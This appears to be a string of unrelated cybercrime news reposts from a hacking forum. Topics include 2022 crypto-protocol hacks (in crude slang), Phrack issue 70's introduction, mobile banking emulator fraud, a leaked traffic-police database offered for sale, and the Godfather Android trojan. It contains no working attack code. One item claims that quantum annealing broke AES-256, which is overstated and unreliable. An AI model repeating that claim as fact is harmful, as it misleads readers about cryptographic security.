По местам пребывания злоумышленника и его возможных сообщников полицейские провели обыски в Хмельницком и Житомире. Обнаружено и изъято серверное оборудование, компьютерную технику, мобильные телефоны, которые содержат доказательства незаконной деятельности.
Сейчас полицейские анализируют массив информации из изъятых гаджетов для установления сообщников фигуранта и источников финансирования его «бизнеса». Отрабатывается версия сотрудничества хакера с агентами РФ.
Следователи объявили фигуранту подозрение по ч. 5 ст. 361 Уголовного кодекса Украины (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей, совершенные во время действия военного положения). Ему грозит до 15 лет лишения свободы с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет.
По результатам расследования возможна дополнительная квалификация.
• Source:
предупреждение! в тексте используется ненормативная лексика. если вас это смущает, прошу закрыть топ.
10 место:
Взлом кредитного протокола QBridge
В конце рейтинга главных инцидентов на рынке крипты в минувшем году открыл
взлом кредитного протокола QBridge.
Проект на базе сети BNB Chain (бывш. Binance Smart Chain) проебал $80 лямов
из-за взлома своей дочки проекта Qubit.
По мнению умников аналитиков, красавчик злоумышленник смог найти недочет в
логике смарт-контракта, спиздив токены из кредитного пула.
9 место:
Взлом кросс-чейн моста Harmony Bridge
9е место присоим проекту Harmony Bridge, который тоже проебал более $100
лямаов в различных альткоинах.
По подсчетам исследователей, Harmony Bridge лишился одиннадцати токенов на
базе алгоритма ERC20, свыше 13 000 ETH, около 5000 BNB и $640 000 в
стейблкоине BUSD.
При этом по мнению SlowMist взлом удалось провернуть не благодаря изъяну в
смарт-контракте, а с помощью кражи приватного ключа администратора проекта.
8 место:
Атака на маркетмейкера Mango Markets
Проект Mango Markets на базе сети Solana тоже лишился ~ $100 ляма, однако
детали до сих пор подсчитываются.
Красавчики с мозгами смогли найти изъян в системе котировочных оракулов путем
рыночной манипуляции с нативным токеном проекта MNGO, что успешно и заюзали.
Впрочем, как именно злоумышленники смогли идентифицировать недочет, до сих пор
неясно.
7 место:
Взлом и спасение блокчейна Elrond
Косяк вокруг блокчейна Elrond выделяется на фоне других лошар в сегменте
криптовалют, поскольку разработчики смогли установить причину взлома,
быстро починить уязвимость и компенсировать убытки. Впрочем, сначала
злоумышленники все же смогли спиздить ~ 1,6 ляма токенов EGLD, что на тот
момент оценивалось в ~$125 ляма.
6 место:
Взлом кросс-чейн моста Nomad
В августе 2022 года проект Nomad Bridge проебал более $190 ляма из-за хак
атаки. Злоумышленник смог заметить нарушения в последовательности верификации
данных у смарт-контракта,
подменив значения для несанкционированного доступа к резервам проекта. К
моменту составления списка кодерам проекта удалось вернуть лишь $36 ляма из
украденной суммы.
5 место:
Вызов неверной функции Wintermute
Горе кодеры проекта Wintermute узнали, что кошелек, который они юзали при
создании проекта, имел дыру. Чтобы обезопасить проект, команда кодеров решила
перевести крипту со старого валета на новый.
В процессе ручного перевода крипты через скрипт кодеры случайно запустили
стороннюю функцию, которая привела к проёбу $160 ляма в токенах.
4 место:
Атака на Beanstalk Farms через флеш-займы
Флеш-займы были популярной схемой атак на проекты из области
децентрализованных финансов.
Проект Beanstalk Farms оказался не исключением и выделился на фоне других тем,
проебав в результате взлома более $180 ляма.
Злоумышленник заметил, что время, выделяемое смарт-контрактом на создание
голосования и проверку результатов, оказалось достаточно большим для обхода
всего процесса.
Из спизженной суммы +/- $250 000 злоумышленники выделили на помощь Украине.
3 место:
Ошибка в коде Wormhole
Тройку самых громких инцидентов открыла сеть Wormhole, через которую хакеры
смогли «из воздуха» напечатать токенов на $326 ляма.
Расследование показало, что в функции, которая отвечала за права доступа у
смарт-контракта в сети Solana, был косяк.
Всего один косяк позволил хакеру провернуть крупнейшую на сегодняшний день
атаку в рамках экосистемы Solana.
2 место:
Взлом кросс-чейн моста BSC Token Hub
Кросс-чейн мост на базе BNB Chain под названием BSC Token Hub проебал примерно
$570 ляма в токенах BNB.
Выяснилось, что хакеры смогли подделывать данные в блоках сети BNB Chain,
заполучив несанкционированный доступ к токенам сети.
Злоумышленников до сих пор так и не нашли.
1 место:
Атака северокорейских хакеров на Ronin Network
Сайдчейн Ronin Network прославился на весь мир после того, как хакеры смогли
спиздить более $600 лямчиков.
По данным властей США, за атакой на проект стоит группировка северокорейских
хакеров Lazarus Group.
При этом для проведения атаки киберпреступникам оказалось достаточно всего
лишь прислать горе сотруднику проекта файл с приглашением на работу, в который
интегрировали вредоносный код.
--Где взял - http://www.phrack.org/issues/70/1.html
--Что такое - Phrack — англоязычный интернет-журнал, существует с 17 ноября
1985 года. Изначально журнал был посвящён взлому телефонных систем, анархии и
хакингу, сейчас так же включает статьи, посвящённые информационной
безопасности, хакингу, криптографии и международным новостям.
Thx guys from Phrack for my happy childhood and everything you did for the
community !!!
Черт, аж прослезился.
Enjoy {username}!
KJ
==Phrack Inc.==
Volume 0x10, Issue 0x46, Phile #0x01 of 0x0f
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Introduction ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------=[ Phrack Staff ]=-------------------------=|
|=-----------------------=[ staff@phrack.org
]=--------------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------[ October 5, 2021 ]=-------------------------=|
|=-----------------------------------------------------------------------=|
Introduction
Phrack! We're back! It was only five years ago that issue 0x45 was
released. It may sound bad, but it is also, indeed, quite bad. Issue 0x45
was released four years after issue 0x44. And we are now five years after
that. Just trying to set the context here. The world is so different and so
many things have happened in these five years that it makes no sense trying
to make any point. Phrack has always been a reflection of the hacking
community, and guess what, the community is moving away from itself. By
this we don't mean that there are no talented hackers, because there most
definitely are (just take a look at our authors). We also don't mean that
there is no exquisite public hacking, because there is (again, our articles
as proof). However, there is a clear move away from the collective hacking
mindset that was most prevalent in the past. The word "scene" brings only
smirks to people's faces. There are many reasons for this, and we are all
to blame
So where is the community right now, and, most importantly, where is it
going?
We are all ego-driven, more so nowadays we would argue, and this has
definitely made collectives much harder to thrive. We expect direct payback
from our hacking, in many forms, including reputation. While it was quite
common to receive anonymous papers, in the past five years we got almost
none. Where is the new Malloc Maleficarum? Quality isn't the question here,
we have high quality hacking, we covered that. The question is about the
community and how it has changed in the last 10-15 years. And about Phrack.
Phrack started as a community zine of exchanging technical information and
hacking techniques in a time that it was hard to find it. It later changed.
It became a symbol of achievement, eliteness, and honor to be published in
Phrack. A slight but significant change happened afterwards. Phrack
gravitated (willingly or not is the subject of another discussion) towards
an academic medium. Academia noticed the high quality of Phrack papers,
started citing them, and basing their offensive and defensive work on them.
Did that alienate the underground that Phrack represented for so many
years? Yes, we think it did. But the underground also changed. Some of it
became involved in malware, spyware, and also the "infosec" industry. And
this mutated the underground. Of course we don't judge. Shouldn't Phrack be
the reflection of the community, whatever the community is? Or should
Phrack be a beacon of the old school underground? Well, it remains to be
seen. Phrack will always be alive as long as the community is alive,
reflecting it. If the hacking community becomes "infosec" in its majority,
then probably so will Phrack. If the heart of the community is CTF, Phrack
will reflect that. If the community focuses on malware, so will Phrack.
Isn't that what Phrack has always done? It always was and always will be
"by the community, for the community". If the community has decided that
Phrack has a five year release cycle, then that's where we are.
Unfortunately, this issue is again an issue of eulogies; we have lost
hackers that have had an enormous impact on our community. Phrack would
like to say goodbye to them. Their loss saddens us deeply, and makes our
community poorer in talent, ethics, and intellect. We also mourn lost
communities. Segfault.net has been our home/hosting in the past and is now
gone.
But we also have some good news! You might have come across Phrack
merchandise [2], well, yes, we have resurrected it! The original 2003 art
work has been found on a backup drive. All profits go to the Electronic
Frontier Foundation. The EFF is a rare example of good and simple advise
for the ordinary citizens. Plus a defender of our rights online and of the
freedom of information. A beacon of light to say the least. The EFF used to
run one of the three FTP servers to download Phrack as well. And let's not
forget that the EFF paid for the attorney of Phrack's co-founder Knight
Lightning in the 1990 court case and supported him all the way. They
defended against the US Secret Service, a ruthless adversary with no
respect for the freedom of information or the hacking scene in general.
With EFF's help the case against Knight Lighting collapsed and the US
Secret Service looked like a pissed on poodle.
The merchandise has the Phrack Gnome on the front and the Hacker's
Manifesto on the back. And ships worldwide.
[1] http://www.phrack.org/issues/69/6.html
[2] https://phrack.myspreadshop.co.uk/
Code:Copy to clipboard
$ cat p70/index.txt
--[ Table of contents
0x01 Introduction ........................................ Phrack Staff
0x02 Phrack Prophile on xerub ............................ Phrack Staff
0x03 Attacking JavaScript Engines: A case study of
JavaScriptCore and CVE-2016-4622 .................... saelo
0x04 Cyber Grand Shellphish .............................. Team
Shellphish
0x05 VM escape - QEMU Case Study ......................... Mehdi Talbi &
Paul Fariello
0x06 .NET Instrumentation via MSIL bytecode injection .... Antonio
's4tan'
Parata
0x07 Twenty years of Escaping the Java Sandbox ........... Ieu Eauvidoum
& disk noise
0x08 Viewer Discretion Advised: (De)coding an iOS
Kernel Vulnerability ................................ Adam Donenfeld
0x09 Exploiting Logic Bugs in JavaScript JIT Engines ..... saelo
0x0a Hypervisor Necromancy; Reanimating Kernel
Protectors .......................................... Aris Thallas
0x0b Tale of two hypervisor bugs - Escaping from
FreeBSD bhyve ....................................... Reno Robert
0x0c The Bear in the Arena ............................... xerub
0x0d Exploiting a Format String Bug in Solaris CDE ....... Marco Ivaldi
0x0e Segfault.net eulogy ................................. skyper
0x0f YouTube Security Scene .............................. LiveOverflow
--[ Greetz
- dakami: pure passion for hacking, will be greatly missed
- navs: our condolences for this brilliant hacker
- accepted authors: thanks for your work, you keep Phrack alive
- rejected authors: we hope our reviews helped you in some way
- past Phrack Staff members: now we know ;)
Spoiler: Phrack policy
------------------------[ Phrack policy
phrack:~# head -77 /usr/include/std-disclaimer.h
/*
----( Contact )----
< Editors : staff[at]phrack{dot}org >
Submissions : staff[at]phrack{dot}org <
Submissions may be encrypted with the following PGP key:
(Hint #1: Always use the PGP key from the latest issue)
(Hint #2: ANTISPAM in the subject or face the mighty /dev/null demon)
Spoiler: PGP Phrack
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PHRACK
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
=vq07
-----------------------------------END PGP PUBLIC KEY
BLOCK-----------------------------
|=[ EOF ]=---------------------------------------------------------------=|
Threat actors behind an ongoing worldwide mobile banking fraud campaign were
able to steal millions from multiple US and EU banks, needing just a few days
for each attack.
To do that, the attackers used huge emulator farms that helped them access
thousands of hacked accounts (compromised after phishing or malware attacks)
using spoofed mobile devices.
While emulators are not malicious tools, the group behind this campaign used
them for malicious purposes emulating compromised devices or setting up what
looked like new devices picked up by the compromised accounts' owners.
For setting up the emulated devices, the attackers used a dedicated tool
capable of feeding device specs from a database of previously compromised
devices, matching each of the spoofed devices with the account holder's
banking credentials.
The mobile emulator farm was even able to spoof a compromised device's GPS
location using virtual private network (VPN) services to hide the malicious
activity from the bank.
"The scale of this operation is one that has never been seen before, in some
cases, over 20 emulators were used in the spoofing of well over 16,000
compromised devices," IBM Trusteer researchers Shachar Gritzman and Limor
Kessem revealed in a report published earlier today.
"The attackers use these emulators to repeatedly access thousands of customer accounts and end up stealing millions of dollars in a matter of just a few days in each case. After one spree, the attackers shut down the operation, wipe traces, and prepare for the next attack."
The cybercrime gang — a group with access to mobile malware developers and highly skilled in fraud and money laundering akin to the TrickBot and Evil Corp gangs — was able to pull off multiple attacks undetected via mobile account takeover using:
During the attacks, the group monitored activity on the compromised banking accounts in real-time to make sure that their fraud attempts were not detected.
If anything went wrong and their attack was in danger of being exposed, they could act in real-time to warnings sent to their command-and-control servers, either modifying their tactics or abruptly shutting down the operation and immediately wiping out any traces.
After the campaign was detected by IBM Trusteer researchers, the cybercrime group didn't stop the attacks but instead updated its tactics which is "indicative of an ongoing operation that is perfecting the process of mobile banking fraud."
"This mobile fraud operation managed to automate the process of accessing accounts, initiating a transaction, receiving and stealing a second factor (SMS in this case) and in many cases using those codes to complete illicit transactions," the IBM Trusteer report [says](https://securityintelligence.com/posts/mobile-emulator-fraud-robs- banks-of-10m-in-days/).
"The data sources, scripts and customized applications the gang created flowed in one automated process which provided speed that allowed them to rob millions of dollars from each victimized bank within a matter of days."
To defend against future attacks using the same tactics, you should avoid rooting or jailbreaking their devices, keep them updated at all times, only install apps from official app stores and legitimate developers.
Additionally, you should never give course to questions or information received via unsolicited text messages and always check bank statements for suspicious activity.
ученые вооружились квантовым компьютером и взломали криптографические алгоритмы банковского и криптовалютного стандарта.
Заявляется, что они применили метод «квантового отжига» и успешно атаковали основные алгоритмы сети замещения-перестановки, на которых построена AES-256 — военный стандарт криптографии.
Ученые заявляют, что угроза реальна и под атакой может оказаться даже Bitcoin, ведь скоро квантовые компьютеры станут доступнее.
Злоумышленники выставили на продажу за $800 базу в 50 млн строк с данными
водителей, которые были зарегистрированы в Москве и Подмосковье с 2006 по 2019
год. Бонусом к покупке предлагается файл с информацией от 2020 года. В базе
содержатся имена, даты рождения, номера телефонов, VIN-коды и номера машин, их
марки и модели, а также год постановки на учет. Сам продавец утверждает, что
получил информацию от инсайдера в ГИБДД. Но источники “Ъ” и эксперты полагают,
что утечка могла произойти на уровне региональных информационных систем,
которые интегрируются с базами ГИБДД для выставления штрафов за нарушение
правил парковки.
Фото: Анатолий Жданов, Коммерсантъ
На одном из форумов, специализирующихся на продаже баз данных и организации
утечек информации, 19 октября выставлен на продажу архив базы данных ГИБДД,
который содержит 50 млн строк записей о водителях Москвы и Подмосковья.
Стоимость архива — $800. “Ъ” связался с продавцом.
По словам последнего, в базе содержатся данные с 2006 по 2019 год, бонусом к
покупке он предложил файл с данными по 2020 году.
Продавец дал образец записей базы. В нем содержатся следующие данные: модель и
марка автомобиля, его регистрационный и VIN-номер, дата постановки на учет,
мощность двигателя, ФИО владельца, дата его рождения, а также номер телефона.
Продавец утверждает, что получил информацию от инсайдера в ГИБДД. “Ъ” обзвонил
пятерых автовладельцев из образца базы, все они отозвались по имени-отчеству,
один из собеседников подтвердил, что владел автомобилем, указанным в файле, но
уже продал его. Остальные отказались подтвердить актуальность информации. В
МВД не ответили на запрос.
Базы данных ГИБДД уже не в первый раз выставляют на продажу. В августе 2020
года в сети появилась база на 1 млн строк с персональными данными столичных
водителей (см. “Ъ” от 3 августа 2020
года). На профильных форумах стоимость
таких баз разных лет варьируется от $1 тыс. до $15 тыс.
Все данные о зарегистрированных машинах и автовладельцах сегодня хранятся
централизованно в Федеральной информационной системе (ФИС) ГИБДД, пояснил “Ъ”
источник, знакомый с ситуацией. Однако, уточнил он, раньше у каждого
регионального управления ГИБДД была собственная база, куда отгружались данные.
Москва и Московская область, говорит собеседник “Ъ”, до 2020 года могли
отгружать данные параллельно в ФИС и в свои системы, затем перестали, и сейчас
региональные системы выводятся из эксплуатации.
Источник “Ъ” предполагает, что утечка могла произойти на уровне регионов.
Руководитель отдела аналитики «СерчИнформа» Алексей Парфентьев уверен, что
причиной утечки стали действия инсайдера. «Это выглядит более вероятно и
потому, что требования регуляторов к таким структурам, как ГИБДД, по части
защиты от внешних атак крайне строгие»,— говорит он.
Однако руководитель направления аналитики и спецпроектов ГК InfoWatch Андрей
Арсентьев не согласен с такой оценкой. Он полагает, что база как раз могла
быть получена в результате внешнего воздействия, например, путем эксплуатации
уязвимости в системном программном обеспечении.
Судя по составу данных, новая база автовладельцев — не выгрузка из системы
ГИБДД, а скорее выгрузка из баз страховщиков, полагает основатель сервиса
разведки утечек данных и мониторинга даркнета DLBI Ашот Оганесян: «Эти данные
могли быть похищены как напрямую у страховых, так и у их подрядчиков, которым
базы передаются для "прозвона"».
Координатор движения «Синие ведерки» Петр Шкуматов говорит, что данные из баз
ГИБДД интересны не только страховщикам: «Их могут использовать мошенники и
продавцы запчастей для таргетинга рекламы».
Но эта утечка явно произошла не из баз ГИБДД, уверен эксперт: «Текущие системы
защиты от внешних атак и действий инсайдеров просто не позволят скопом
выгружать базы данных».
По информации Петра Шкуматова, слабые места злоумышленники находят в тех
ведомствах, информационные системы которых интегрируются с базами ГИБДД: «Это
могут быть, например, муниципалитеты различных региональных городов, которым
недавно предоставили право штрафовать водителей за неправильную парковку». В
этих структурах, отмечает эксперт, требования к информационной безопасности
зачастую
ниже.
Вотана https://xss.is/threads/57921/
14 марта власти США продали 9861 BTC на общую сумму около $215,7 млн, согласно поданным в конце месяца судебным документам.
Реализованные активы составили лишь часть из более 50 000 BTC, конфискованных у Джеймса Чжуна в ноябре 2021 года. Спустя год он признал вину в их незаконном получении на даркнет-маркетплейсе Silk Road.
Согласно Минюсту США, в сентябре 2012 года Чжун реализовал мошенническую схему с использованием фейковых аккаунтов, не выставляя и не покупая на площадке какие-либо товары или услуги.
По данным властей, он вносил депозиты в размере от 200 до 2000 BTC, после чего осуществлял быстрое снятие средств в кратном размере. Он инициировал более 140 подобных транзакций, что в сумме принесло ему 50 000 BTC.
«Осталось примерно 41 491 BTC, которые правительство будет ликвидировать четырьмя партиями в течение календарного года. […] Второй раунд ликвидаций не состоится до вынесения приговора Чжуну», — говорится в документах.
Click to expand...
Основатель Tron Джастин Сан выразил готовность приобрести конфискованные биткоины со скидкой в 10% для «минимизации потенциального влияния на рынок».
По курсу на момент написания 41 491 BTC стоят около $1,18 млрд.
source:
docdroid.net/cAA99Gw/123-pdf
twitter.com/justinsuntron/status/1641862563662282753
Прокуратура Нью-Йорка передала в суд более 80 тысяч страниц дела, связанного с обвинениями в адрес члена Палаты представителей США от Республиканской партии Джорджа Сантоса (George Santos). Как передает со ссылкой на Associated Press портал STLToday, Сантос не признал себя виновным в том, что он обманывал спонсоров партии, воровал деньги из собственной предвыборной кампании, мошенничеством получал пособия по безработице, а также лгал Конгрессу о том, что он миллионер.
Всего прокуратура предъявила Сантосу обвинения по 13 пунктам, среди которых также присутствуют мошенничество с использованием электронных средств, отмывание денег, кража государственных средств и дача ложных показаний. В случае вынесения обвинительного приговора Сантосу, который известен как первый открытый гей-республиканец в Палате представителей, грозит до 20 лет лишения свободы.
Сантос назвал федеральное расследование «охотой на ведьм», пообещав не только остаться в Конгрессе, но и добиться переизбрания. Республиканские лидеры призвали коллегу отказаться от планов по повторному выдвижению своей кандидатуры на следующих выборах. Однако исключить его из своих рядов они не смогли, так как у них минимальный перевес в Палате представителей над демократами, а изменение расстановки сил потенциально отрицательно скажется на шансах действующего главы США на переизбрание в 2024 году.
Следующее заседание назначено на 7 сентября 2023 года. Пока же Сантос остается на свободе, хотя ему и рекомендовали уведомлять полицию о любых своих передвижениях по стране.
Сантос допрашивался в 2017 году полицией на предмет возможной связи с международной кардерской группировкой. Конгрессмен от Нью-Йорка говорил своим знакомым, что был тайным информатором силовых структур, однако подтвердить или опровергнуть это невозможно: Сантос оказался одним из наиболее выдающихся мистификаторов своего времени, начинавшим свой путь в американскую высшую политику, изображая трансвестита на пляжах в Бразилии.
source: stltoday.com/news/nation- world/article_c82c847d-038b-5ad9-ad13-60757dfa392e.html
Троян похищает данные для входа в приложение и выводит деньги пользователя.
Первоисточник: Grop-IB
Эксперты Group-IB предупредили о новом банковском трояне — вредоносном
приложении Godfather («Крестный отец»), которое атакует пользователей в 16
странах мира.
«Согласно новому исследованию Group-IB, жертвами трояна стали пользователи 215 международных банков, 94 криптокошельков и 110 криптопроектов», — сообщила пресс-служба компании.
Godfather нацелен на смартфоны на ОС Android.
Вирус маскируется под одно из приложений в Play Market, криптокалькулятор шпионит за работой смартфона жертвы, и как только та заходит в приложение своего банка, ворует ее логин и пароль, после чего выводит деньги со счета, уточнил «Ведомостям» представитель компании. Данных об общей сумме похищенных у пользователей средств, а также названий банков, пользователи которых подверглись нападению, он не привёл.
«Наибольшая интенсивность атак была зафиксирована в США, Турции, Испании, Канаде, Франции и Великобритании. При этом Godfather обходит стороной пользователей из России и СНГ: если настройки системы содержат один из языков этих стран, троян прекратит свою работу», — отмечают в Group-IB.
В компании связывают это с тем, что разработчиками Godfather могут быть русскоязычные злоумышленники.
